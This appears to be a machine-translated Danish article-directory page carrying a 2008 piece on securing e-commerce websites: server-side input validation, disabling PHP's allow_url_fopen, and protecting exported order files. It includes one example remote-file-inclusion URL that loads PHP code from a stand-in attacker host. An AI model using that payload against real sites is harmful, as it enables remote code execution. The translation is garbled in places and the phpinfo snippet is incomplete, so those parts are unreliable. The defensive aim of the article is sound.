The following content has been automatically translated by close 
E-Commerce Sikkerhed - Fjernelsen af sikkerhedshuller | A Ecommerce Artikel
Artikel Sphere Logo

E-Commerce Sikkerhed - Fjernelsen af sikkerhedshuller

Af Expert Forfatter: Paul Roberts | Artikel Abstract
Ordoptælling: 520 ord | Views: 123 se (s)
Sikkerhed i en e-handel website skal være en vigtig overvejelse, når de udvikler en e-handel website eller software. En udvikler skal være opmærksomme på alle de sikkerhed ved at designe et websted. Med e-handel bliver det mere almindeligt i disse dage, er antallet af angreb på sikkerheden helt sikkert stigende. Paranoia er en sund ting for e-handel bygherrer, vi er nødt til at holde op til gaten med sikkerhedsspørgsmål, og holde vores ører og øjne åbne. Selv om de følgende huller er alvorlige, de følgende huller, hvis denne er let fast.

Nedenstående liste omfatter en række sikkerheds overvejelser, der skal medtages, når de udvikler et websted. Denne artikel omfatter ikke e-butikstyveri, kan du se min separat artikel om dette.

Brugerinput - hver indgang, det være sig ind i en mængde, der søger efter et produkt, indtaste et navn osv., der skal valideres for mistænkelige tegn. Hvis dette ikke sker, er det muligt at indtaste "?>", lukning slutningen tags i PHP og udføre nogle PHP kode.

Det er langt sikrere at tal og tegn az (hovedstæder inkluderet) og 0-9 og intet andet, i stedet lave en liste over alle de tegn, der ikke skal være der. Validering script behov for at rulle gennem hvert tegn én efter én. Dette skal nås ved hjælp af i server side validering, ikke Javascript. Brug af server side input validering er vigtigt at holde uønskede tegn

Der findes en anden vigtig når de udfører PHP kode. Når du bruger PHP der er en indstilling kaldet allow_url_fopen som gør det muligt at åbne filer fra et PHP script. Denne indstilling skal være slukket, medmindre det er absolut nødvendigt.

Forestil Dem, du har PHP-scripts til både faste sidehoveder og sidefødder, og få adgang til dine websider, du ville skrive i http://www.mysite.com/index.php?page=page2. Alt det kræver er en hacker at køre et script ved at ændre disse parametre ved at skrive "http:// www.mysite.com/index.php?page=http://www.evilhack.com/hacker.txt" med nogle PHP kode i filen "hacker.txt". Du kunne have noget ske, filer PHP læst, slettede vitale oplysninger stjålet.

Hvis du ikke er sikker på, hvis denne indstilling er tændt eller slukket, skal du kopiere følgende PHP-kode i en tekstfil, og uploade den til din webserver:

phpinfo ();
?>

Når du får adgang til dit script på din webserver, skal du komme på tværs af indstillingen allow_url_fopen under konfiguration.

En computer-bruger, kan under normale omstændigheder ikke finde værdien af denne indstilling.

Vær forsigtig med eksporterede data som ordrer, produkter i CSV og MySQL-filer. Hvis disse data eksporteres fra et script og holdes på webserveren under et fælles filnavn dvs. http://www.mysite.com/admin/output_tables.csv. Det er faktisk kun et problem, når de eksporterede data er bosat i en fil i en mappe, som er offentligt tilgængelige. Der er to måder at undgå dette smuthul - For det første har uddatafilen bag et password beskyttet mappe, for det andet har de data, der befinder sig inde i en HTML-textarea form element på et script. Det storeowner kan derefter kopiere disse oplysninger fra tekstfiler og oprette en ny fil på deres computer og indsætte oplysningerne her.

Alt det kræver er en hacker at finde dette filnavn ved at tjekke e-handel software's demo hjemmeside og kigge efter samme filnavn på en rigtig hjemmeside.
Paul Roberts

Om Forfatter / Author Bio

Paul Roberts
Jeg kører en udvikling af software firma med speciale i E-handel, Search Engine Optimization, og Udskriv Skøn software kaldet Robo Design Solutions. Jeg vil også udvikle New Zealand e-handel løsninger og software under navnet Robo Design.

Article Source: http://www.da.articlesphere.com/Article/E-Commerce-Security---Plugging-the-Security-Holes/145459

Article Submitted: 2008-06-05 | This Article has been viewed 123 times.

Rate Article

Related Videos

How to Strengthen Network Security with Cisco Network Manager
Understanding your Home Network Router #5 - Secure Your Network with WPA2
Learn About Secure Computing
SÃ¥dan at holde din computer sikker
Hvordan skal kontrollere sikkerheden i Windows Vista

More "E-handel" Relaterede artikler

Nedenstående liste omfatter flere artikler relateret til ovenstående artikel fra "E-handel" artiklen kategori.

Folk er interesseret i ovenstående artikel "E-Commerce Sikkerhed - Fjernelsen af sikkerhedshuller" er også interesseret i de relaterede artikler anført nedenfor:

Kørsel af en e-handel er ikke bare om at holde din hjemmeside op at køre. Kunder stole på din evne til at tjene dem via telefon, fax, e-mail, eller på anden måde, og det kræver alle dine systemer, der skal arbejde for at kunne opfylde kundernes ønsker.
Bare et par dage tilbage Jeg havde en snak med min ven. Han fejrede sin baby's 1. fødselsdag og var nødt til at køre mellem sit hjemland i Kerala og Chennai, hans arbejdsplads. Han og hans bedre halvdel rejste mellem disse steder mindst 4 gange i sidste måned.
Hvis du har været i forbindelse med e-handel til enhver tid, ville du have vidst, at der er flere scamers end ægte udbydere af engrossalg Dropship nummeroplysningstjenester. I en verden af e-business, Salehoo og Worldwide Brands er både seriøse udbydere, der har vundet popularitet i de sidste mange år.
Hvis du nogensinde har været en online forhandler, har du sikkert allerede har hørt om Salehoo eller endda brugt det til din fordel. Hvis du lige er startet ud med din virksomhed, kan du blive forvekslet med den blandede Salehoo anmeldelser derude. Lad os tage et kig på, hvad Salehoo egentlig drejer sig om, og de tjenester, de tilbyder, som mange har tendens til at overse.
Hvor mange kender du, der har købt noget online? Hvis du ligesom mig en hel del, det er derfor, e-handel er verdens nye online indkøbscenter. Men hvem kører disse online-butikkerne? Mennesker ligesom dig og mig, det er grunden til denne forretning blomstrer, og vil fortsætte med at bommen nu og langt ind i fremtiden.
Hvis du er en stor fan af de nyeste elektroniske produkter, kan du blive fristet af tanken om at køre din egen elektronik forretning online. Det er ikke så svært at komme i gang, når du tager den fulde fordel af retten drop shipping elektronik service, og der er masser for dig at vælge fra.
Har du nogensinde gå ind i din lokale nærbutik og spekulerer på, hvad det ville være, hvis du ejer det? Vil du være en god ejer, vil folk som dig? Nå denne artikel vil vise dig fordelene ved at eje din egen online-butik, eller almindeligt kendt som e-handel, der adskiller sig fra en reel lokal dagligvarebutik.
Artikel Directory Home Alle kategorier Internet og e-business E-handel

Kan du ikke finde det, du leder efter? Prøv Google Search!
Copyright © 2005 -- af Larry Lim, Singapore - Artikel Search Engine Directory på ArticleSphere.com ™
All Rights Reserved Worldwide. Alle varemærker og tjenestemærker tilhører de respektive ejere.

Afrikaans Albansk Arabisk Hviderussisk Bulgarsk Katalansk Kinesisk (forenklet) Kinesisk (traditionelt) Kroatisk Tjekkisk Dansk Tysk Engelsk Estisk Filippinsk Finsk Fransk Galicisk Græsk Hebraisk Hindi Ungarsk Islandsk Indonesisk Irsk Italiano Japansk Koreansk Lettisk Litauisk Makedonsk Malay Maltesisk Hollandsk Norsk Persisk Polsk Portugisisk Rumænsk Russisk Serbisk Slovakisk Slovensk Spansk Swahili Svensk Thai Tyrkisk Ukrainsk Vietnamesisk Walisisk Jiddisch